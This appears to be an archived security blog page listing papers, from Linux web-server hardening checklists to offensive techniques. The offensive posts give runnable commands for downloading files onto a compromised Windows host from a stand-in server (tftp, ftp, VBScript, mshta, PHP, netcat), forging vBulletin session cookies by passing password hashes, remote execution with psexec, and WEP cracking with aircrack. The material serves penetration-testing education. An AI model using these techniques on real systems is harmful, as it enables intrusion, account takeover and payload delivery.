Archive Papers

Securing & Hardening Linux Web Server (Part II – Practice)

This paper will try to cover the most important steps to properly securing and hardening your Linux web server.

  1. Part I   - Theory
  2. Part II – Practice

So, let’s assume that we bought a new dedicated server and we just installed from the vendor’s control panel a fresh Linux distribution with the following details:

Server (Dedicated)
Operating System (Ubuntu 11.04)
Web Server (Apache 2.2.x)
Database Server (MySQL 5.1.x)
Name Server (Bind 9.7.x)
SSH Server (OpenSSH 5.8.x)
Firewall (IPTables 1.4.x)

The following security solutions will most probably work with the different services’ versions and different Linux distributions. You will just need to find some more details for your system such as different paths for configuration files etc.

Operating System [Ubuntu]

Software and Services

- Review installed packages and remove unnecessary

1. dpkg -l			// list of installed packages or dpkg --get-selections
2. dpkg -s			// to get information abou the package
3. apt-get remove	// uninstall unnecessary packages

- Review running services and remove/disable unnecessary

1. service --status-all			// list services
2. service <name> [start|stop|status]	// start/stop temporary
3. update-rc.d <name> defaults		// enable permanently
4. update-rc.d -f <name> remove		// disable permanently

Avoid using unencrypted services such as FTP, TELNET, HTTP, etc… use instead SFTP/FTPS/SCP/RSYNC, SSH, HTTPS

Tools:  sysv-rc-conf, chkconfig, rcconf


Read more

Share
Photo

root

July 7th

Papers

Securing & Hardening Linux Web Server (Part I – Theory)

This paper will try to cover the most important steps to properly securing and hardening your Linux web server.

  1. Part I – Theory
  2. Part II – Practice

In the first part, we will discuss what do we need to do theoretically to secure our Linux web server without explaining how we can exactly do it in practice. In this way, we can avoid the confusion of different configuration for different systems, Linux distributions and services.

- What do we need to run a web server?

Server (Local, Dedicated, VPS etc)
Operating System (Linux distribution)
Web Server (eg. Apache)
Database Server (eg. MySQL)
Name Server (eg. Bind)
SSH Server (eg. OpenSSH)
Firewall (eg. IPTables)

That’s a very basic configuration for a Linux web server. However, in your case maybe it’s slightly different. For example, you will not need to run SSH if you have local access or maybe you need to run more services such as Mail server.

- What kind of attacks do we need to prevent for a server like this one?

Mass Packets
     Denial of service (DOS)
     Brute force (SSH Login, HTTP Login Forms, DNS Lookups, …)
     Web Scanning (Crawling, File/Dir Brute force, …)

Known Vulnerabilities Exploitation (running services, web applications, …)
Information Exposure (Versions, Error messages etc)
Web Attacks (SQL Injections, Cross-site Scripting, File Inclusions, …)

Now, that we know what kind of system we need to run our web server and what kind of attacks we need to prevent, we need to know…

- What do we need to do to prevent the above kind of attacks?

Operating System

Patching, Updating, Monitoring, Logging, Backup
Remove unnecessary Users, Packages, Services
Use strong password policy
Review file permissions, ownership, SUID/SGID files
Install security tools (Rootkit Hunter, Chkrootkit, Tripwire, …)

Web Server

Change default version banners
Disable verbose error messages
Disable directory listing
Disable unnecessary modules, functions
Install security modules (web application firewall for DOS and Web attacks)
Secure coding for custom web applications

Database Server

Remove unnecessary Users
Change default root username
Restrict access from the outside world

Name Server

Change default version banners
Disable recursion, zone transfers and Port 53/tcp

SSH Server

Change default version banners, Display welcome banner
Change default listen port
Use only protocol 2, public key authentication
Disable remote root access
Restrict access to specific IP Address(es) if that possible

Firewall

Default Policy deny all
Identify Spoofing, Invalid IP Addresses
Identify Invalid Packets
Identify Port scanning
Identify Mass Packets (DOS Attacks, SYN Flood, Web Scanning, Brute force for SSH Logins, HTTP Login Forms, DNS Lookups)
Allow necessary services
Enable Logging & Ban

 
Related

Securing & Hardening Linux Web Server (Part II – Practice)

Share
Photo

root

June 27th

Papers

Creating Binary Files on a Firewalled Server

This article introduces techniques that an attacker, who has already access to execute commands on a server, could use to create binary files on server which has no internet access (firewalled) or web filtering (antivirus).

Download

 

Related

Download Files using default windows commands

Share
Photo

root

June 23rd

Papers

How Internal Network becomes External

Contents

1. Information gathering for the external network
2. Seeking for vulnerabilities & misconfigurations
3. Using flaws to get a shell
4. Information gathering for the internal network
5. Escalating privileges for the internal network
6. Converting internal network to external

 

Download

 

Share
Photo

root

June 23rd

Papers

When encryption is unserviceable

Some times we use encryption just to feel more secure. But many times the real truth is that the encryption is unserviceable even if we have a very difficult/big password with a strong encryption algorithm. I’ll give two examples to explain this idea.

1. Forums

We suppose that the Administator of a www.oneforum.com forum has a very strong password. We know
that the forum uses MD5 algorithm for password encryption. Then someone steals Administrator’s
cookie with some XSS vulnerability in this forum and he know the md5 hash
bbbd53e913a404b04abf373dc1dac49b. It’s easy for him to find Administrator’s UserID from members.php
for example http://www.oneforum.com/member.php?u=123 when he looks for Admin’s profile.

In this scenario crackers try to crack the md5 hash with program like John the Ripper, Cain & Abel
or Passwordpro etc. This method for a strong password will take a year, maybe more.
Is this the best way?

No.Why we have to find the real password and we use it with the standard way in the Login Form when
we can do a http request with the prefered web page in the forum (ex. Admin’s Forum ->
forumdisplay.php?f=123) including in the http header the cookie with Administrator’s data (we dont
need the real password only the hash).

A http request example in the above scenario…

————————————————————————————-
GET http://www.oneforum.com/forumdisplay.php?f=123 HTTP/1.1
Host: www.oneforum.com
Cookie: bbuserid=123; bbpassword=bbbd53e913a404b04abf373dc1dac49b;
————————————————————————————-

2. Shares

Another example that it’ll help us to understand why encryption sometimes is unservicable are Shares.

We suppose that we have access to a LAN which uses Sharing. We can find LM/NTLM hashes with many
ways (ex. Sniffing(ettercap), PwDump, Findpass, CacheDump etc). We know that if we crack this hashes
we can map a network drive with the victim’s local drives, we can execute commands or we can take a
remote desktop.

All the known tools need the real password to work … examples …

A) Map a network drive (net command)
net use z: \\administrator-cn\c$ /USER: DOMAIN\Administrator <password>

B) Remote execute commands (psexec)
psexec \\administrator-cn -u DOMAIN\Administrator -p <password> c:\winnt\notepad.exe

C) Remote desktop (mstsc)
mstsc.exe it asks for Username/Password.

…but the clear text password travels over the network?

No. Just the hash. So if we could send the hash not the password with above tools we dont need to
crack the very strong password and we see why the encryption in this situation is unservicable too.

Of course the encryption is important for more security but we have to know when it can be unservicable.
The real hackers don’t need to crack :)

Related

Passing the hash in VBulettin
msvctl
Pass-The-Hash Toolkit
SMBProxy

Share
Photo

root

June 23rd

Papers

WEP Cracking with aircrack

 

  1. Finding the target
  2. Capture packets from target (IVS)
  3. Cracking WEP

1. Finding the target

The first step is to find our target. Ensure that our target uses WEP Encryption and that you can get a good signal.

Commands

  • airmon-ng start wifi0 // Start your card in monitoring mode
  • airodump-ng ath1 // Start monitoring and find your target (Write down channel of your target, in this example 11)


Read more

Share
Photo

root

June 23rd

Papers

Download Files using default windows commands

  1. tftp
  2. ftp
  3. VB Script
  4. PHP Script
  5. Netcat / Telnet

1. tftp

c:\>tftp -i myserver.com GET inout_file.xxx

2. ftp

download.cmd
——————-
open myserver.com
GET inout_file.xxx
quit
——————-

c:\>ftp -s:c:\download.cmd -A

3. VB Script

download.vbs
————————————————————-
Dim DataBin
Dim HTTPGET
Set HTTPGET = CreateObject(“Microsoft.XMLHTTP”)
HTTPGET.Open “GET”, “http://myserver.com/input_file.xxx”, False
HTTPGET.Send
DataBin = HTTPGET.ResponseBody
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim SendBinary
Set SendBinary = CreateObject(“ADODB.Stream”)
SendBinary.Type = adTypeBinary
SendBinary.Open
SendBinary.Write DataBin
SendBinary.SaveToFile “c:\output_file.xxx”, adSaveCreateOverWrite
————————————————————-

get.hta
——————————————————————————————–
<html>&lt;script language=’vbscript’ src=’http://myserver.com/download.vbs’></script></html>
——————————————————————————————–

c:\>get.hta

or

//rename download.vbs download.hta
c:\>mshta http://myserver.com/download.hta

4. PHP Script

download.php
——————————————————-
<?php
$url=”http://myserver.com/input_file.xxx”;
$destination=fopen(“output_file.xxx”,”w”);
$source=fopen($url,”r”);
while ($a=fread($source,1024)) fwrite($destination,$a);
fclose($source);
fclose($destination);
?>
——————————————————-

c:\>php download.php

5. Netcat / Telnet

<myserver>
nc -v -l -p 80 -u -vvv < input_file.xxx

<client>
c:\>nc -u myserver.com 80 > output_file.xxx

or

<client>
c:\>telnet -f output_file.xxx myserver.com 80 //it doesnt work very well

 

Related

Creating Binary Files on a Firewalled Server

Share
Photo

root

June 23rd

Papers

Passing the hash in VBulettin

 

  1. Find md5 hash from VBulettin database
  2. Find Licence Number from VBulettin config.php
  3. Change hash propertly for Cookie ( md5($hashInDB . $VBlicence)
  4. Create Cookie

1. Find md5 hash from VBulettin database

We consider that you already  have the md5 hash for password from VBulettin database… (SELECT password FROM user) the format for this md5 hash is -> md5(md5($pass).$salt) [PHP]
ex. 6e84265e3ba153be675164a64dd801b0

2. Find Licence Number from VBulettin config.php

We consider that you have access to victim’s web dir ex. /home/<user>/public_html/
Then you just need to read /home/<user>/public_html/includes/config.php and you will se something like this…

VBulleting conf

/*================================================*\
|| ################################################ ||
|| # vBulletin 3.6.X – Licence Number XXXXXXXXXX
|| # —————————————————————-
|| # All PHP code in this file is ?2000-2007 Jelsoft Enterprises Ltd.
|| # This file may not be redistributed in whole or significant part.
|| # —————- VBULLETIN IS NOT FREE SOFTWARE —————-
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html
|| ################################################ ||
\*================================================*/

so now you have the licence number ex. XXXXXXXXXX

3. Change hash propertly for Cookie ( md5($hashInDB . $VBlicence)

VBulleting uses these technique for cookie’s hash -> md5($hashInDB . $VBlicence) so we will make a php script to change the initial md5 hash to a propertly md5 hash for cookie

<?php
echo md5(“6e84265e3ba153be675164a64dd801b0″ . “XXXXXXXXXX”);
?>

result:
ex. a52a7b7c8940cd35ca20827351f2eb1c

4. Create Cookie

A general example for vbulletin’s cookie…

Cookie: bblastvisit=1185263194; bblastactivity=0; bbuserid=124; bbpassword=4ec842e9ece18137271ff9b8f00d07b8

The cookie that will work for this scenario …

Cookie: bbuserid=1; bbpassword=a52a7b7c8940cd35ca20827351f2eb1c

 

Related

When encryption is unserviceable

Share
Photo

root

June 23rd

Papers
line

© 2017 SuRGeoNix | Security Blog